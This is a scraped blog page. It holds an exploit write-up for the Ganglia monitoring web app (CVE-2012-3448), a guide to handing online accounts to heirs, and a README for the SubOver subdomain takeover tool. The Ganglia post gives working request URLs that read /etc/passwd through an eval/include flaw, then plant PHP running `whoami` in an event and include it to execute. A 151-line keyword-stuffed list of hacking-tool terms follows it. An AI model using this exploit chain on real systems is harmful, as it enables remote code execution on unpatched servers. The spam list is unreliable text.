Saturday, August 29, 2020

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448

Read more


  1. Hacking Tools Github
  2. New Hacker Tools
  3. How To Make Hacking Tools
  4. Hacking Tools Name
  5. Hack Tools For Pc
  6. Hack Tools Mac
  7. Hack Tools For Mac
  8. Hacker Tools Software
  9. Pentest Tools For Windows
  10. Pentest Tools
  11. Underground Hacker Sites
  12. Pentest Reporting Tools
  13. Hacker Tools Windows
  14. Growth Hacker Tools
  15. How To Make Hacking Tools
  16. New Hacker Tools
  17. Hacker Tools 2020
  18. Game Hacking
  19. Hack Tools Mac
  20. Pentest Reporting Tools
  21. Physical Pentest Tools
  22. Github Hacking Tools
  23. Hacker Tools Mac
  24. Growth Hacker Tools
  25. Hack Tools
  26. Hacker Tools 2019
  27. Pentest Tools Online
  28. Hacking Tools 2020
  29. Wifi Hacker Tools For Windows
  30. Pentest Tools List
  31. Nsa Hacker Tools
  32. Black Hat Hacker Tools
  33. Hacking Tools For Kali Linux
  34. Pentest Tools Free
  35. Hacker Tool Kit
  36. Nsa Hacker Tools
  37. Pentest Tools For Ubuntu
  38. Hacking Tools Windows 10
  39. Pentest Recon Tools
  40. Hacker Tools Linux
  41. Hacking Tools Windows 10
  42. Hacker Tools
  43. Hack Website Online Tool
  44. Hacking Tools Download
  45. Hack Tools
  46. Hacker Tools Windows
  47. Hacking Tools For Windows 7
  48. Hacking Tools Usb
  49. Pentest Tools Apk
  50. Beginner Hacker Tools
  51. Tools 4 Hack
  52. Physical Pentest Tools
  53. How To Hack
  54. Hack Tools Online
  55. Hack Tools 2019
  56. Beginner Hacker Tools
  57. Hacking Tools For Windows Free Download
  58. Hacker Tools Windows
  59. Hacking Tools And Software
  60. Hacker Tools Online
  61. Hack Tools Download
  62. Hack Rom Tools
  63. Hacking Tools Hardware
  64. Tools 4 Hack
  65. Usb Pentest Tools
  66. Hacker Tools Apk Download
  67. Hacking Tools 2019
  68. Hack Tool Apk
  69. Pentest Tools Url Fuzzer
  70. Hacking Tools For Pc
  71. Pentest Tools Linux
  72. Hacking Tools Mac
  73. Hacking Tools
  74. Hack Tools For Windows
  75. Pentest Tools Find Subdomains
  76. Hacking Tools Usb
  77. Hacking Tools Online
  78. Pentest Tools Kali Linux
  79. Hacking Tools Kit
  80. Hacker Tools Github
  81. Pentest Tools Github
  82. Computer Hacker
  83. Hack Tools For Mac
  84. Hack Tools 2019
  85. Tools 4 Hack
  86. Free Pentest Tools For Windows
  87. Hacking Tools Mac
  88. Hack Tool Apk No Root
  89. Blackhat Hacker Tools
  90. Hack Website Online Tool
  91. Blackhat Hacker Tools
  92. Tools Used For Hacking
  93. Hacker Tools Hardware
  94. Hacking Tools Software
  95. Bluetooth Hacking Tools Kali
  96. Hacking Tools Free Download
  97. Hacker Search Tools
  98. Physical Pentest Tools
  99. Top Pentest Tools
  100. Hack Tool Apk No Root
  101. Pentest Tools Website
  102. Usb Pentest Tools
  103. Hacker Tools
  104. Hack Tools
  105. Pentest Tools Subdomain
  106. Pentest Tools Find Subdomains
  107. Hacking Tools Download
  108. Hack Tools
  109. Hacking Tools 2020
  110. Termux Hacking Tools 2019
  111. Pentest Tools Open Source
  112. Hacker Tools
  113. Hacking Tools 2020
  114. Hack Tools 2019
  115. Hacking Tools For Windows Free Download
  116. Hacker
  117. Hacker Tools
  118. Hacking Tools For Windows Free Download
  119. Github Hacking Tools
  120. Hacking Tools For Pc
  121. Pentest Tools Review
  122. Kik Hack Tools
  123. Hacker Tools 2020
  124. Hack Tools For Mac
  125. Pentest Tools Free
  126. Hacker Tools
  127. Pentest Tools Alternative
  128. Pentest Reporting Tools
  129. Hacking Tools For Windows 7
  130. Hack Tools For Windows
  131. Hacker Tools For Pc
  132. Hacking Tools 2019
  133. Hacker Tools Apk Download
  134. Github Hacking Tools
  135. Bluetooth Hacking Tools Kali
  136. Tools For Hacker
  137. Hacker Tools Apk Download
  138. Easy Hack Tools
  139. Hacking Tools And Software
  140. Hack Tools For Games
  141. Hacking Tools
  142. Pentest Tools Online
  143. Hacking Tools Windows
  144. Hacker Tools List
  145. Hack Tools Pc
  146. Hacking Tools For Beginners
  147. How To Hack
  148. Pentest Tools Apk
  149. Hack Website Online Tool
  150. Hacker Tools Hardware
  151. Easy Hack Tools
Posted by at No comments:

How To Pass Your Online Accounts After Death – 3 Methods

The topic of DEATH is not one that most people care to talk about, but the truth is that we are all going to die at some point and everything that we did online is going to end up in limbo if we don't make sure that someone we trust is going to be able to gain access to this information. This is going to be extremely important in order to close it down, or have your loved one do whatever you want them to do with your information. There are many things to take into consideration for this kind of situation. If you are like the average modern person, you probably have at least one email account, a couple of social media accounts in places like Facebook and Twitter. Perhaps you also have a website that you run or a blog. These are all very common things that people will usually do at some point and if you have anything that you consider valuable, you should have a way to leave it in the hands of someone you trust when you pass away.

Pass Accounts and Passwords After Death
Pass Accounts and Passwords After Death

Maybe you have an online platform that has a lot of content that you find useful and important. Perhaps you have even been able to turn some of that content into monetizable material and you don't want this to end when you pass away. This is more than enough of a reason to make sure that your information can be given to someone when you are no longer around.
There have been many cases when all the information has ended up being impossible to recover when a person has died, at least not without the need for the family members to do all kinds of things in order to prove a person is deceased. So here are some ways, you can passyour online accounts/data after death:

1) Making a Safe 'WILL' (or Locker) containing master password.

  1. Make an inventory of all your online accounts and list them on a piece of paper one by one and give it to your loved one. For eg:– Your primary email address
    – Your Facebook ID/email
    – The Bank account or Internet banking ID
    – etc. To clarify, it will be only a list of the accounts you want your loved one to be able to access after you're dead. Just the list of accounts, nothing else (no passwords).
  2. Set up a brand new e-mail address (Possibly Gmail account). Lets say youraccountsinfo@gmail.com
  3. Now from your usual email account, Send an e-mail to youraccountsinfo@gmail.com, with the following content:– dd349r4yt9dfj
    – sd456pu3t9p4
    – s2398sds4938523540
    – djfsf4p These are, of course, the passwords and account numbers that you want your loved one to have once you're dead.
  4. Tell your loved one that you did these things, and while you're at it, send him/her an e-mail from youraccountsinfo@gmail.com, so he/she will have the address handy in some special folder in his/her inbox.
  5. Put the password for youraccountsinfo@gmail.com in your will or write it down on paper and keep it safe in your bank locker. Don't include the e-mail address as well, just put something like "The password is: loveyourhoney432d".
And its done! Your loved one will only have the password once you're dead, and the info is also secure, since it's split in two places that cannot be easily connected, so if the e-mail address happens to be hacked, the perpetrator won't be able to use it to steal anything that you're going to leave for your loved one.

2) Preparing a Future email (SWITCH) containing login information

This method is very similar to the first one except in this case we will not be using a WILL or Locker. Instead we will be using a Service called "Dead Mans Switch" that creates a switch (Future email) and sends it to your recipients after a particular time interval. Here is how it works.
  1. Create a list of accounts as discussed in the first method and give it to your loved one.
  2. Register on "Dead mans switch" and create a switch containing all the corresponding passwords and enter the recipients email (Your loved one).
  3. Your switch will email you every so often, asking you to show that you are fine by clicking a link. If something happens to you, your switch would then send the email you wrote to the recipient you specified. Sort of an "electronic will", one could say.

3) Using password managers that have emergency access feature

Password managers like LastPass and Dashlane have a feature called as "emergency access".  It functions as a dead man's switch. You just have to add your loved one to your password manager, with emergency access rights. he/She does not see any of your information, nor can he/she log into your accounts normally.
But if the worst happens, your loved one can invoke the emergency access option. Next your password manager sends an email to you and starts a timer. If, after a certain amount of time interval, you have not refused the request, then your loved one gets full access to your password manager.
You can always decide what they can potentially gain access to, and you set the time delay.

Why should i bother about passing my digital legacy?

Of all the major online platforms, only Google and Facebook have provisions for Inactiveaccounts (in case of death). Google lets you plan for the inevitable ahead of time. Using the "Inactive Account Manager", you can designate a beneficiary who will inherit access to any or all of your Google accounts after a specified period of inactivity (the default is 3 months).
Facebook on the other hand will either delete your inactive account or turn it into a memorial page when their family can provide any proof of their death, but there is also a large number of platforms that don't have any specific way for people to be able to verify the death of a loved one in order to gain access to the accounts. In either case, you wouldn't want your family to have to suffer through any hassles and complications after you have passed away.
You should also consider the importance of being able to allow your loved ones to collect all the data you left behind. This means photos and experiences that can be used to show other generations the way that you lived and the kind of things you enjoyed doing.
Those memories are now easier to keep and the best photos can be downloaded for the purpose of printing them for photo albums or frames. Allowing them to have the chance to do this in a practical way is going to be a great gesture and securing any profitable information is going to be essential if you want a business or idea to keep moving forward with the help of those you trust.
This is the reason why you need to be able to pass your online account information after death, but no one wants to give access to this kind of information to their loved ones because it's of a private nature and we would feel uneasy knowing that others can access our private conversations or message.

Related articles


Posted by at No comments:

SubOver - A Powerful Subdomain Takeover Tool


Subover is a Hostile Subdomain Takeover tool designed in Python. From start, it has been aimed with speed and efficiency in mind. Till date, SubOver detects 36 services which is much more than any other tool out there. The tool is multithreaded and hence delivers good speed. It can easily detect and report potential subdomain takeovers that exist. The list of potentially hijackable services is very comprehensive and it is what makes this tool so powerful.

Installing
You need to have Python 2.7 installed on your machine. The following additional requirements are required -
  • dnspython
  • colorama
git clone https://github.com/Ice3man543/SubOver.git .
cd SubOver
# consider installing virtualenv
pip install -r requirements.txt
python subover.py -h

Usage
python subover.py -l subdomains.txt -o output_takeovers.txt
  • -l subdomains.txt is the list of target subdomains. These can be discovered using various tool such as sublist3r or others.
  • -o output_takeovers.txtis the name of the output file. (Optional & Currently not very well formatted)
  • -t 20 is the default number of threads that SubOver will use. (Optional)
  • -V is the switch for showing verbose output. (Optional, Default=False)

Currently Checked Services
  • Github
  • Heroku
  • Unbounce
  • Tumblr
  • Shopify
  • Instapage
  • Desk
  • Tictail
  • Campaignmonitor
  • Cargocollective
  • Statuspage
  • Amazonaws
  • Cloudfront
  • Bitbucket
  • Squarespace
  • Smartling
  • Acquia
  • Fastly
  • Pantheon
  • Zendesk
  • Uservoice
  • WPEngine
  • Ghost
  • Freshdesk
  • Pingdom
  • Tilda
  • Wordpress
  • Teamwork
  • Helpjuice
  • Helpscout
  • Cargo
  • Feedpress
  • Freshdesk
  • Surge
  • Surveygizmo
  • Mashery
Count : 36

FAQ
Q: What should my wordlist look like?
A: Your wordlist should include a list of subdomains you're checking and should look something like:
backend.example.com
something.someone.com
apo-setup.fxc.something.com

Your tool sucks!
Yes, you're probably correct. Feel free to:
  • Not use it.
  • Show me how to do it better.

Contact
Twitter: @Ice3man543

Credits


Related news
Posted by at No comments:
Subscribe to: Posts (Atom)